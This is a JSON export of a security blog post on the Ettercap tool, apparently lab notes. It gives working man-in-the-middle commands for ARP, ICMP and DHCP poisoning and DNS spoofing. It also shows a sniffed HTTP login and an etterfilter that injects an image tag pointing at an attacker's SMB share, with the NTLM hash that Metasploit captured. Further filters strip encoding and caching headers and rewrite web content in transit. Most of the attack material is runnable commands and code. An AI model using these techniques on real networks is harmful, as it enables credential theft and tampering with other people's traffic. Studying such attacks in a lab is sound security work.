{"id":47,"date":"2017-07-01T11:14:03","date_gmt":"2017-07-01T09:14:03","guid":{"rendered":"http:\/\/itsec.andreas-klingler.de\/?p=47"},"modified":"2023-12-20T19:09:30","modified_gmt":"2023-12-20T18:09:30","slug":"ettercap","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=47","title":{"rendered":"Ettercap"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Sniff\u00ading and live con\u00adtent fil\u00adter\u00ading. Oper\u00ada\u00adtion&nbsp;modes:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Uni\u00adfied<\/strong>:&nbsp; sniffs all pack\u00adets from one inter\u00adface. Pack\u00adets for an attack host are end\u00ading here, but are direct\u00adly for\u00adward\u00aded after receiving<\/li><li><strong>Brid\u00adget<\/strong>: For\u00adwards traf\u00adfic from one inter\u00adface to anoth\u00ader. Absolute\u00adly secret because there is real\u00adly no one \u201cbetween the&nbsp;cable\u201d<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Usage<\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">ettercap OPTIONS TARGET1 TARGET2<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>Tar\u00adgets are defined as <span class=\"caps\">MAC<\/span>\/IPv4s\/IPv6s\/<span class=\"caps\">PORT<\/span> (there is no <span class=\"caps\">DEST<\/span> or <span class=\"caps\">SRC<\/span> because traf\u00adfic is bi-directional)&nbsp;<ul>\n<li>Exam\u00adple: 84:38:35:54:27:54\/192.168.5.100\/ (<span class=\"caps\">MAC<\/span> defined, <span class=\"caps\">IP<\/span> defined, all&nbsp;Ports)<\/li>\n<li>Exam\u00adple: \/192.168.5.100\/ (Every paket with this ip, every <span class=\"caps\">MAC<\/span> and&nbsp;Port)<\/li>\n<\/ul>\n<\/li><li>When using with Wire\u00adshark, use the <em>\u2013only-mitm<\/em> option. Etter\u00adcap will the dis\u00adable the sniffing.<\/li><li>Sniff\u00ading <span class=\"caps\">WLAN<\/span>: See the man\u00adpage for using the \u2013wiki-key option for pro\u00advid\u00ading the&nbsp;key.<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\"><li>When using on a gateway:&nbsp;<ul>\n<li>Etter\u00adcap dis\u00adables ip_forwarding in the kernel.<\/li>\n<li>It drops per\u00admis\u00adsions so it can\u2019t enable it after termination.<\/li>\n<li>So make sure to enable it man\u00adu\u00adal\u00adly after every&nbsp;use!<\/li>\n<\/ul>\n<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">ARP-poisening MitM attack<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">A man in the mid\u00addle attack can be per\u00adformed via three&nbsp;ways:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Via <span class=\"caps\">ARP<\/span>: Poi\u00adson\u00ading the <span class=\"caps\">ARP<\/span> cache of the attacked client.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">ettercap -M arp<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>Via <span class=\"caps\">ICMP<\/span>:&nbsp; Uses <span class=\"caps\">ICMP<\/span> redi\u00adrec\u00adtion by announc\u00ading a new\/better route to the inter\u00adnet. This catch\u00ades <em>only<\/em> traf\u00adfic <em>from<\/em> the attacked client. The <span class=\"caps\">MAC<\/span> and <span class=\"caps\">IP<\/span> of the real gate\u00adway have to be provided.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">ettercap -M icmp:MAC\/IP<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>Via <span class=\"caps\">DHCP<\/span>: Uses <span class=\"caps\">DHCP<\/span> spoof\u00ading and tries to \u201cwin\u201d the <span class=\"caps\">DHCP<\/span> <span class=\"caps\">ACK<\/span> race with the real <span class=\"caps\">DHCP<\/span> serv\u00ader. A <span class=\"caps\">IP-POOL<\/span> is nec\u00ades\u00adsary which should con\u00adtain many free address\u00ades in the net\u00adwork. <span class=\"caps\">NETMASK<\/span> should be giv\u00aden accord\u00ading\u00adly and an <span class=\"caps\">IP<\/span> for a <span class=\"caps\">DNS<\/span> server.&nbsp;<ul>\n<li><strong>Cau\u00adtion<\/strong>: After end\u00ading a sniff\u00ading ses\u00adsion, the attacked client will be have no con\u00adnec\u00adtion until the <span class=\"caps\">DHCP<\/span> release!<\/li>\n<\/ul>\n<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">ettercap -M dhcp:IP-POOL\/NETMASK\/DNS<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">DNS<\/span> spoofing<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario: You want the vic\u00adtim to con\u00adnect to your server.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Set\u00adup the fakes webserver<\/li><li>Manip\u00adu\u00adlate <code>\/etc\/ettercap\/etter.dns<\/code> and set the Domains and the <span class=\"caps\">IP<\/span> of the fake webserver<\/li><li>Start etter\u00adcap: Source is the gate\u00adway, tar\u00adget the attacked hosts.<\/li><\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">ettercap -T -Q -i eth1 -P dns_spoof -M arp \/192.168.5.254\/\/ \/192.168.5.105-106\/2003:df:6bde:f600:d5:e501:b0c3:e7ef\/<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Password sniffing<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">htauth<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The fol\u00adlow\u00ading will per\u00adform an arp spoff\u00ading in the same net\u00adwork and show the user\u00adname and pass\u00adword as soon as the vic\u00adtims access a htpass\u00adwd-pro\u00adtect\u00aded&nbsp;page.<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Set up a sys\u00adtem with a web\u00adserv\u00ader and a pro\u00adtect\u00aded directory.<\/li><li>Access it from the vic\u00adtim <span class=\"caps\">VM<\/span> and check that all is con\u00adfig\u00adured correctly.<\/li><li>On the attack\u00ader <span class=\"caps\">VM<\/span> and let etter\u00adcap poi\u00adson each traf\u00adfic from $tar\u00adget:<br><code>ettercap -T -i eth0 -M arp:remote \/$target\/\/<\/code><\/li><li>As soon as the user request\u00aded the site one time, the cre\u00adden\u00adtials are shown in std\u00adout:<br><code>HTTP : 192.168.178.67:8080 -&gt; USER: geheim PASS: password INFO: 192.168.178.67:8080\/geheim\/<\/code><\/li><li>Quit etter\u00adcap by press\u00ading the <code>q<\/code> but\u00adton. This will \u201crepoi\u00adson\u201d the tar\u00adgets sys\u00adtem with the cor\u00adrect address so that at the next request it will work for the vic\u00adtim as&nbsp;usual.<\/li><\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Samba<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario: You want to redi\u00adrect <span class=\"caps\">SMB<\/span> cre\u00adden\u00adtials to an own serv\u00ader to get hashes.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1. Start <span class=\"caps\">SMB<\/span> cap\u00adture serv\u00ader in Metasploit:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>msf&gt; use auxiliary\/server\/capture\/smb<br>msf&gt; set JOHNPWFILE \/tmp\/john.hashes<br>msf&gt; exploit<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">2. Cre\u00adate a etter\u00adcap filter:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">if (ip.proto == TCP &amp;&amp; tcp.dst == 8080) {\n  \/\/ Prevents compressed responses from the server.\n  if (search(DATA.data, \"Accept-Encoding\")) {\n    replace(\"Accept-Encoding\", \"Accept-Enc0d1ng\");\n  }\n\n  \/\/ Prevents caching\n  if (search(DATA.data, \"If-Modified-Since\")) {\n    replace(\"If-Modified-Since\", \"If-Modified-After\");\n  }\n\n  \/\/ Add a image tag after the header. File should exists, 1 transparent pixel.\n  replace(\"&lt;head&gt;, \"&lt;head&gt;&lt;img src=\\\"\\\\\\\\$attacker\\share\\fake.jpg\\\"&gt;\");\n  msg(\"Header injected with share image reference.\\n\");\n}<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">3. The smb lis\u00adten\u00ader in Metas\u00adploit receives hashes:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[*] SMB Captured - 2021-05-02 12:48:37 +0000\nNTLMv2 Response Captured from 192.168.178.68:50358 - 192.168.178.68\nUSER:lab03 DOMAIN:TVM23-WIN10 OS: LM:\nLMHASH:Disabled\nLM_CLIENT_CHALLENGE:Disabled\nNTHASH:e7dc...\nNT_CLIENT_CHALLENGE:010100000000000039df2778513fd70126e9088084dd2a9e00000000020000000000000000000000<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Replace content<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sce\u00adnario:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>$serv\u00ader runs a web\u00adserv\u00ader on $port which con\u00adtent you want to change dur\u00ading transit:<\/li><li>$vic\u00adtim request\u00aded a site from $serv\u00ader with the unchanged content:<br><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"218\" class=\"wp-image-3066\" style=\"width: 300px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-13.32.28.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-13.32.28.png 820w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-13.32.28-300x218.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-13.32.28-768x557.png 768w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\"><\/li><li>You are $attack\u00ader.<\/li><\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Process:<\/p>\n\n\n\n<ol class=\"wp-block-list\"><li>Pro\u00advide the changed con\u00adtent on your attack machine. We want to change the image here with <code>http:\/\/$attacker\/kali.jpg<\/code>.<\/li><li>Cre\u00adate the fol\u00adlow\u00ading fil\u00adter. Note that in real\u00adi\u00adty you would add more con\u00addi\u00adtions to make sure to only change the desired page and not all traf\u00adfic.<br><code>if (ip.proto == TCP &amp;&amp; ip.dst == '$target' &amp;&amp; tcp.src == $port) {<br>  replace(\"&lt;img src=\", \"&lt;img src=\\\"http:\/\/$attacker\/kali.jpg\\\" data-o=\");<br>  msg(\"Image replaced.\\n\");<br>}<\/code><\/li><li>Com\u00adpile the fil\u00adter:<br><code>etterfilter replace_image.filter -o replace_image.ef<\/code><\/li><li>Exe\u00adcute:<br><code>ettercap -T -i eth0 -F replace_image.ef -M arp:remote <code>\/$target\/\/<\/code> \/$target\/\/<\/code><\/li><li>If the $tar\u00adget now vis\u00adits the page, it won\u2019t work. Because the Con\u00adtent-Length head\u00ader was not changed and the new <span class=\"caps\">HTML<\/span> body is longer!<br><img loading=\"lazy\" decoding=\"async\" width=\"500\" height=\"104\" class=\"wp-image-3069\" style=\"width: 500px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-13.49.44.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-13.49.44.png 748w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-13.49.44-300x62.png 300w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\"><\/li><li>So, pay atten\u00adtion to side effects as well. Unfor\u00adtu\u00adnatel\u00adly, because etter\u00adcap changes pack\u00adets, we may not have the Con\u00adtent-Length head\u00ader in the same pack\u00adet and thus can\u00adnot used it to cal\u00adcu\u00adlate an updat\u00aded length. There\u00adfore, try to mod\u00adi\u00adfy a larg\u00ader string por\u00adtion and try to not mod\u00adi\u00adfy the body\u2019s length. In our test case, the source of the <span class=\"caps\">HTML<\/span> file looks as fol\u00adlows:<br><code>Our software:<br>&lt;img src=\"win10.jpg\" alt=\"The ultimative system for bluescreens.\" \/&gt;<\/code><\/li><li>We want to replace <em>win10<\/em> (5 char\u00adac\u00adters) with <em>http:\/\/192.168.178.29\/kali<\/em> (26 char\u00adac\u00adters). There\u00adfore we have to cut off 21 char\u00adac\u00adters:<br>img src=\u201cwin10.jpg\u201d alt=\u201cThe ulti\u00adma\u00adtive sys\u00adtem for blue\u00adscreens.\u201d<br>\u2026<br>img src=\u201chttp:\/\/192.168.178.29\/kali.jpg\u201d alt=\u201cThe ultimative\u2026\u201d<\/li><li>Both strings have now an equal length and we can update the fil\u00adter:<br><code>if (ip.proto == TCP &amp;&amp; ip.dst == '$target' &amp;&amp; tcp.src == $port) {<br>  replace(\"img src=\\\"win10.jpg\\\" alt=\\\"The ultimative system for bluescreens.\\\"\", \"img src=\\\"http:\/\/192.168.178.29\/kali.jpg\\\" alt=\\\"The ultimative\u2026\\\"\");<br>  msg(\"Image replaced.\\n\");<br>}<\/code><\/li><li>Com\u00adpile the fil\u00adter as before.<\/li><li>Exe\u00adcute etter\u00adcap if as before.<\/li><li>It still does\u00adn\u2019t&nbsp;work.<\/li><li>Look\u00ading through the etter\u00adcap out\u00adput, you can see that the <span class=\"caps\">HTTP<\/span> response head\u00ader con\u00adtains <code>Content-Encoding: gzip<\/code>. This means that the pack\u00adet is com\u00adpressed and there\u00adfore the string-based replace\u00adment can\u00adnot&nbsp;work.<\/li><li>The prop\u00ader solu\u00adtion would be to redi\u00adrect the traf\u00adfic through an own (squid?) proxy which would for\u00adward the response in a uncom\u00adpressed man\u00adner. For this exam\u00adple, I just dis\u00adable com\u00adpres\u00adsion in the $server\u2019s Apache con\u00adfig\u00adu\u00adra\u00adtion by set\u00adting <code>SetEnv no-gzip 1<\/code> in the Vir\u00adtu\u00adal\u00adHost configuration.<\/li><li>Try it&nbsp;again.<\/li><li>Now it worked:<br><img loading=\"lazy\" decoding=\"async\" width=\"300\" height=\"238\" class=\"wp-image-3070\" style=\"width: 300px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-14.17.54.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-14.17.54.png 746w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2017\/07\/Bildschirmfoto-2021-05-02-um-14.17.54-300x238.png 300w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\"><\/li><li>But\u2026 If we just remove the browsers Accept-Encod\u00ading head\u00ader where it tells the serv\u00ader that it accepts a com\u00adpressed response, then\u2026 the serv\u00ader would not com\u00adpress the response! And: An addi\u00adtion\u00adal prob\u00adlem could be that caching pre\u00advents the tar\u00adget\u2019s brows\u00ader to update the con\u00adtent. Try to mod\u00adi\u00adfy caching head\u00aders as well. The final script:<\/li><\/ol>\n\n\n\n<pre class=\"wp-block-preformatted\">\/\/ This changes the browsers request and \"removes\" the Accept-Encoding header\n\/\/ which normally would lead the server to respond with an unencrypted plain\n\/\/ text response.\nif (ip.proto == TCP &amp;&amp; tcp.dst == 8080) {\n    if (search(DATA.data, \"Accept-Encoding\")) {\n       replace(\"Accept-Encoding\", \"Accept-Rubbish!\");\n    }\n }\n\n\/\/ This replaces the response.\nif (ip.proto == TCP &amp;&amp; ip.dst == '192.168.178.68' &amp;&amp; tcp.src == 8080) {\n  if (search(DATA.data, \"If-Modified-Since\")) {\n    replace(\"If-Modified-Since\", \"If-42dified-Since\");\n  }\n  if (search(DATA.data, \"If-None-Match\")) {\n    replace(\"If-None-Match\", \"If-1337-Match\");\n  }\n  replace(\"img src=\\\"win10.jpg\\\" alt=\\\"The ultimative system for bluescreens.\\\"\", \"img src=\\\"http:\/\/192.168.178.29\/kali.jpg\\\" alt=\\\"The ultimative\u2026\\\"\");\n  msg(\"Image replaced.\\n\");\n}<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Sniff\u00ading and live con\u00adtent fil\u00adter\u00ading. Oper\u00ada\u00adtion&nbsp;modes: Uni\u00adfied:&nbsp; sniffs all pack\u00adets from one inter\u00adface. Pack\u00adets for an attack host are end\u00ading here, but are direct\u00adly for\u00adward\u00aded after receiv\u00ading Brid\u00adget: For\u00adwards traf\u00adfic from one inter\u00adface to anoth\u00ader. Absolute\u00adly secret because there is real\u00adly no one \u201cbetween the&nbsp;cable\u201d Usage etter\u00adcap <span class=\"caps\">OPTIONS<\/span> <span class=\"caps\">TARGET1<\/span> <span class=\"caps\">TARGET2<\/span> Tar\u00adgets are defined as <span class=\"caps\">MAC<\/span>\/IPv4s\/IPv6s\/<span class=\"caps\">PORT<\/span> [\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[469,470,475,476],"tags":[17,15,19,18,8],"class_list":["post-47","post","type-post","status-publish","format-standard","hentry","category-passive-enum","category-active-enum","category-attack-tool","category-defence-tool","tag-ettercap","tag-man-in-the-middle","tag-password-retrieving","tag-sniffing","tag-ssl"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/47","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=47"}],"version-history":[{"count":18,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/47\/revisions"}],"predecessor-version":[{"id":3121,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/47\/revisions\/3121"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=47"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=47"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=47"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}